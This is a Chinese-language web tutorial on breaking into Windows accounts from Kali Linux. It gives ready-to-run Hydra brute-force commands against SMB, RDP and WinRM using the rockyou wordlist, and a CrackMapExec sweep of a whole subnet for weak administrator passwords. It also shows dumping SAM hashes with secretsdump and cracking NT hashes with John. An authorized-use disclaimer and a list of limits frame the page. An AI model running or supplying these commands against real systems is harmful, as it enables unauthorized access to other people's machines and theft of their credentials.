当前位置:首页>Linux>Kali Linux 远程破解 Windows 用户密码

Kali Linux 远程破解 Windows 用户密码

  • 2026-09-05 23:16:59
Kali Linux 远程破解 Windows 用户密码
⚠️ 重要声明:未经授权远程入侵、爆破他人 Windows 密码属于严重违法犯罪,本教程仅用于授权渗透测试、安全演练,非法使用后果自负。

一、适用场景

  • 目标 Windows 主机在线、可网络访问
  • 目标开启了远程端口:SMB(445)、RDP(3389)、WinRM(5985/5986)
  • 采用字典爆破/弱口令扫描,不是“一键黑进去”

二、核心工具:Hydra(万能远程爆破)

Kali 自带,无需安装。

1. 爆破 SMB 共享密码(最常用)

hydra -l 用户名 -P 字典.txt 目标IP smb

示例:

hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.1.100 smb

参数:

  • -l
    :指定单个用户名
  • -L
    :用户名字典
  • -P
    :密码字典
  • smb
    :协议类型

2. 爆破远程桌面 RDP 密码

hydra -l administrator -P 字典.txt 目标IP rdp

3. 爆破 WinRM 远程管理密码

hydra -l administrator -P 字典.txt 目标IP winrm

三、批量扫描弱口令(CrackMapExec)

安装

apt install crackmapexec

扫描网段内 Windows 弱口令

crackmapexec smb 192.168.1.0/24 -u administrator -p 密码.txt

成功会显示:[+] IP:PORT IP:PORT STATUS:LOGIN

四、获取 Windows 哈希后破解(更高级)

1. 拿到 SAM 哈希(需已拿到权限)

secretsdump.py 域名/用户:密码@目标IP

2. 使用 John 破解哈希

john --format=nt hash.txt --wordlist=字典.txt

五、关键限制(必须知道)

  1. 现代 Windows 默认防御极强
    :账户锁定、防火墙拦截、SMB 禁用
  2. 公网 IP 几乎无法爆破
    :防火墙、安全软件会直接拦截
  3. 必须在授权环境下测试
    ,否则涉嫌非法控制计算机系统
  4. 弱口令才可能成功,复杂密码基本破不了

六、最简一句话模板

hydra -l administrator -P /usr/share/wordlists/rockyou.txt 目标IP smb

最新文章

随机文章